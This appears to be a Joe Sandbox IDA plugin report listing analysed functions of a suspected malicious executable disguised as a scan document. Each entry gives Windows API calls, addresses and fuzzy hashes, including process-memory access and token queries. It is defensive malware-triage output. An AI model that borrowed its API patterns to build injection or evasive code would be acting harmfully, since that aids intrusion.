Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 447f8a425c38262dc6a83ecf43315af64649f8c6ab163f904c49406117e3bdf2
Instruction ID: da435009536782110b502a65d46bcc5dce07b8b5f21a795665217bd4463b98dc
Opcode Fuzzy Hash: 447f8a425c38262dc6a83ecf43315af64649f8c6ab163f904c49406117e3bdf2
Instruction Fuzzy Hash: 9101F43220D60D77DA1267396C85E2B2B69FBD23B9BE40129F421E2293EF74CC018121

Function 0087000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0086FF41,80070057,?,?,?,0087035E), ref: 0087002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0086FF41,80070057,?,?), ref: 00870046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0086FF41,80070057,?,?), ref: 00870054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0086FF41,80070057,?), ref: 00870064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0086FF41,80070057,?,?), ref: 00870070

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 6f33481e19e967b5f8a7e5d3641040009eb0cc137cdb390baadeaae4ba8b0225
Instruction ID: ee89200bfad049ea9e2f16d94b934cf0854e0747b46e31833a5e60f3711f8597
Opcode Fuzzy Hash: 6f33481e19e967b5f8a7e5d3641040009eb0cc137cdb390baadeaae4ba8b0225
Instruction Fuzzy Hash: B501AD72600604FFEB108F68DC04BAA7AEDFF497A2F148124F909D2314EB75DD409BA0

Function 0087E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0087E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0087E9A5
Sleep.KERNEL32(00000000), ref: 0087E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0087E9B7
Sleep.KERNEL32 ref: 0087E9F3

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: fbf59f5f8103581892fc3e979493bcfe4fc9c98e2e04c7b84aa4814f4dd99aa7
Instruction ID: e8671d783757d48a8f54d9dca43c4eb98d644f0c8a34a1dd1580c7c82c7c7990
Opcode Fuzzy Hash: fbf59f5f8103581892fc3e979493bcfe4fc9c98e2e04c7b84aa4814f4dd99aa7
Instruction Fuzzy Hash: 73010532D0162DDBDF00ABE5D859BEDBB78FB0E701F004596EA06F2245CB3495558BA1

Function 008710F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00871114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00870B9B,?,?,?), ref: 00871120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00870B9B,?,?,?), ref: 0087112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00870B9B,?,?,?), ref: 00871136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0087114D

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 0c388830020a4137424687fd29f3d82236c65a8105ea0f3265d78c82b3a84637
Instruction ID: da3384582b05139e5089db9d02036d53c6da0f7acf89bd89b8a136f7302226ec
Opcode Fuzzy Hash: 0c388830020a4137424687fd29f3d82236c65a8105ea0f3265d78c82b3a84637
Instruction Fuzzy Hash: B9011975200205BFEB114FA9DC4DA6A3B6EFF8A3A0B604419FA45D7760DA31DD009A60

Function 00870FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00870FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00870FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00870FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00870FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00871002

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: e5af3018e422cb32dec97d0c4e8a8ebf0e302fe946984c001202941bfe326b05
Instruction ID: b0be2a920a6126f7b4c69688060500b13668765fe8e622d0dd744adbd4239405
Opcode Fuzzy Hash: e5af3018e422cb32dec97d0c4e8a8ebf0e302fe946984c001202941bfe326b05
Instruction Fuzzy Hash: C5F04935200701ABEB214FA89C4DF563BADFF8AB62F104414FA49C6651DE70DC508A60

Function 00871014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0087102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00871036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00871045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0087104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00871062

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 2a298950b3560cccd696698e5590e0d0fd681424442d0ec41fbf814b16d6e512
Instruction ID: 3f5f91e11c88501fa89fc270732a6624432747475a59cece021461699ccce633
Opcode Fuzzy Hash: 2a298950b3560cccd696698e5590e0d0fd681424442d0ec41fbf814b16d6e512
Instruction Fuzzy Hash: 64F04935200701ABEB219FA8EC4DF563BADFF8A761F104414FA49C6650DE70D8508A60

Function 0088030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0088017D,?,008832FC,?,00000001,00852592,?), ref: 00880324
CloseHandle.KERNEL32(?,?,?,?,0088017D,?,008832FC,?,00000001,00852592,?), ref: 00880331
CloseHandle.KERNEL32(?,?,?,?,0088017D,?,008832FC,?,00000001,00852592,?), ref: 0088033E
CloseHandle.KERNEL32(?,?,?,?,0088017D,?,008832FC,?,00000001,00852592,?), ref: 0088034B
CloseHandle.KERNEL32(?,?,?,?,0088017D,?,008832FC,?,00000001,00852592,?), ref: 00880358
CloseHandle.KERNEL32(?,?,?,?,0088017D,?,008832FC,?,00000001,00852592,?), ref: 00880365

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: edcd758a46512f2c6327ecf3334624bb1b681dc22bc204ee9dad8bc805e3aa96
Instruction ID: a1a26e24c5108b9d86efd86074efbcf5c755b376fb135f8c02dba47dc13eae9d
Opcode Fuzzy Hash: edcd758a46512f2c6327ecf3334624bb1b681dc22bc204ee9dad8bc805e3aa96
Instruction Fuzzy Hash: BB016C72801B159FCB30AF66D890816FBF9FE602153158A3ED19692A31C7B1A959DF80

Function 0084D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0084D752

Part of subcall function 008429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0084D7D1,00000000,00000000,00000000,00000000,?,0084D7F8,00000000,00000007,00000000,?,0084DBF5,00000000), ref: 008429DE
Part of subcall function 008429C8: GetLastError.KERNEL32(00000000,?,0084D7D1,00000000,00000000,00000000,00000000,?,0084D7F8,00000000,00000007,00000000,?,0084DBF5,00000000,00000000), ref: 008429F0

_free.LIBCMT ref: 0084D764
_free.LIBCMT ref: 0084D776
_free.LIBCMT ref: 0084D788
_free.LIBCMT ref: 0084D79A

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 62f871b8d1889659a193eae531eb8815ee0da2af07252cde60b6ed7707d661fd
Instruction ID: 9296f7bf3507a5bfc472f1f11da9265e27329b60633d580bfba55d4c8c5d612f
Opcode Fuzzy Hash: 62f871b8d1889659a193eae531eb8815ee0da2af07252cde60b6ed7707d661fd
Instruction Fuzzy Hash: 78F01D3254A30DAB9621EB69F9C6D1ABFDDFB44710BE40D06F048E7502CB30FC808A65

Function 00875C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00875C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00875C6F
MessageBeep.USER32(00000000), ref: 00875C87
KillTimer.USER32(?,0000040A), ref: 00875CA3
EndDialog.USER32(?,00000001), ref: 00875CBD

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 9b09bdb1dee2706ff4e2d7125fd6430e4948f21d5e4423edb72cef66be2d1bd0
Instruction ID: 16b818071be4168717eeefd5c1ba66fce19e6fb9af3f0e7d9278e30aa7c565a6
Opcode Fuzzy Hash: 9b09bdb1dee2706ff4e2d7125fd6430e4948f21d5e4423edb72cef66be2d1bd0
Instruction Fuzzy Hash: AF018130500B08ABFB219B50DD8EFA677B8FF51B05F04455DA587E14E1DBF4A9848A90

Function 008422A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008422BE

Part of subcall function 008429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0084D7D1,00000000,00000000,00000000,00000000,?,0084D7F8,00000000,00000007,00000000,?,0084DBF5,00000000), ref: 008429DE
Part of subcall function 008429C8: GetLastError.KERNEL32(00000000,?,0084D7D1,00000000,00000000,00000000,00000000,?,0084D7F8,00000000,00000007,00000000,?,0084DBF5,00000000,00000000), ref: 008429F0

_free.LIBCMT ref: 008422D0
_free.LIBCMT ref: 008422E3
_free.LIBCMT ref: 008422F4
_free.LIBCMT ref: 00842305

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 43381f4fe83f3551d9863e2f3f7b85e4a65cf96ba9a6669297e64bf33ade2765
Instruction ID: 253c4deb202b244bb50cee25d458dc7fd7d5d5185d6bf5a418c9e1ded6ceb265
Opcode Fuzzy Hash: 43381f4fe83f3551d9863e2f3f7b85e4a65cf96ba9a6669297e64bf33ade2765
Instruction Fuzzy Hash: 68F05E708091A59B9A12EF99BC81D0C3F68F7187607800A1BF414DA2B5CB711862EFE5

Function 008295C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 008295D4
StrokeAndFillPath.GDI32(?,?,008671F7,00000000,?,?,?), ref: 008295F0
SelectObject.GDI32(?,00000000), ref: 00829603
DeleteObject.GDI32 ref: 00829616
StrokePath.GDI32(?), ref: 00829631

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 0709e0c9139c3cf92ad96fa9b7ad536e31306cfdf3aca2a975c769d097cfd76b
Instruction ID: b3c50a94adf40547de9b950cfc38650b340b580122a132a971c889b680b6abd4
Opcode Fuzzy Hash: 0709e0c9139c3cf92ad96fa9b7ad536e31306cfdf3aca2a975c769d097cfd76b
Instruction Fuzzy Hash: ABF04F30005648EBEF126F65ED5C7643FA1FB12322F448214F565994F2CB3489D1DF20

Function 00840F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 008410F9
__freea.LIBCMT ref: 00841117

Part of subcall function 00841537: _free.LIBCMT ref: 0084154F

Strings

am/pm, xrefs: 0084117A
a/p, xrefs: 008411DE

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 41649554c4a1ddda6e9bbf398edd4aa16249b15d8a40e0288bbd445748779cb1
Instruction ID: 5fdee0413b8cd5eeb4361d79ea63106bb2752e7aa3d0283ded9a8a3c1cdf9ef7
Opcode Fuzzy Hash: 41649554c4a1ddda6e9bbf398edd4aa16249b15d8a40e0288bbd445748779cb1
Instruction Fuzzy Hash: CAD1DE31A1020E9ADF289F68C89DABAB7B1FF05704F284159E911EBB50D7799DC0CB91

Function 00897B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00830242: EnterCriticalSection.KERNEL32(008E070C,008E1884,?,?,0082198B,008E2518,?,?,?,008112F9,00000000), ref: 0083024D
Part of subcall function 00830242: LeaveCriticalSection.KERNEL32(008E070C,?,0082198B,008E2518,?,?,?,008112F9,00000000), ref: 0083028A

Part of subcall function 00819CB3: _wcslen.LIBCMT ref: 00819CBD

Part of subcall function 008300A3: __onexit.LIBCMT ref: 008300A9

__Init_thread_footer.LIBCMT ref: 00897BFB

Part of subcall function 008301F8: EnterCriticalSection.KERNEL32(008E070C,?,?,00828747,008E2514), ref: 00830202
Part of subcall function 008301F8: LeaveCriticalSection.KERNEL32(008E070C,?,00828747,008E2514), ref: 00830235

Strings

Variable must be of type 'Object'., xrefs: 00897C3A
G, xrefs: 00897C7F
5, xrefs: 00897C78

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: 653990a053cc4bac546e6aa1ba49286bb324366b59d56a0695d7db9fa290c8e1
Instruction ID: 378f778ff601613632eb0f92874d0ca3bfe1a9629d50d43ccbb12665f515a95a
Opcode Fuzzy Hash: 653990a053cc4bac546e6aa1ba49286bb324366b59d56a0695d7db9fa290c8e1
Instruction Fuzzy Hash: 6F918970A14209EFCF04EF98D8919ADB7B5FF49304F188059F806DB292DB71AE85CB52

Function 00872716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0087B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008721D0,?,?,00000034,00000800,?,00000034), ref: 0087B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00872760

Part of subcall function 0087B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0087B3F8

Part of subcall function 0087B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0087B355
Part of subcall function 0087B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00872194,00000034,?,?,00001004,00000000,00000000), ref: 0087B365
Part of subcall function 0087B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00872194,00000034,?,?,00001004,00000000,00000000), ref: 0087B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008727CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0087281A

Strings

@, xrefs: 00872832

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: b03f31979b71c8fe1999019e2264c3e11692615ead24f86757782d4604eaf87f
Instruction ID: e04bc967268eaf9c8680fde97fd1dd52b0e1a3805ef186f5e0cddd1dba06ca77
Opcode Fuzzy Hash: b03f31979b71c8fe1999019e2264c3e11692615ead24f86757782d4604eaf87f
Instruction Fuzzy Hash: DB411F72900218AFDB10DBA8CD45BDEBBB8FF05700F108095FA59B7185DB71AE85DB91

Function 0084172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe,00000104), ref: 00841769
_free.LIBCMT ref: 00841834
_free.LIBCMT ref: 0084183E

Strings

C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe, xrefs: 00841760, 00841767, 00841796, 008417CE

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe
API String ID: 2506810119-2787788371
Opcode ID: 13955819af2e51a0aa501a5fd4b85d54051b51e16188c0ac1dccfd05616853be
Instruction ID: 524df0cd09e16bcdfd3f360fcf9fa9e6ce9ada851ad86d15fe89db6edff16341
Opcode Fuzzy Hash: 13955819af2e51a0aa501a5fd4b85d54051b51e16188c0ac1dccfd05616853be
Instruction Fuzzy Hash: BC316D71A4425CEBDF21DB99DC89D9EBBFCFB89310B544166F904DB211D6B08E80CB91

Function 0087C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0087C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0087C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,008E1990,00D06828), ref: 0087C395

Strings

0, xrefs: 0087C2DF

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 503e71d9d729636b04418efcc4275b5551d0cc0d0087b83fa5ed4c5d13579e73
Instruction ID: 756c7f3130142dce2905ff85324e22512374db8bdc189acc11f349a20c9fae1b
Opcode Fuzzy Hash: 503e71d9d729636b04418efcc4275b5551d0cc0d0087b83fa5ed4c5d13579e73
Instruction Fuzzy Hash: 814156712043019FD7209F29D885B6ABBE8FB85324F148A1DF9A9D73D5D730E904CB62

Function 008A4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,008ACC08,00000000,?,?,?,?), ref: 008A44AA
GetWindowLongW.USER32 ref: 008A44C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 008A44D7

Strings

SysTreeView32, xrefs: 008A447C

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
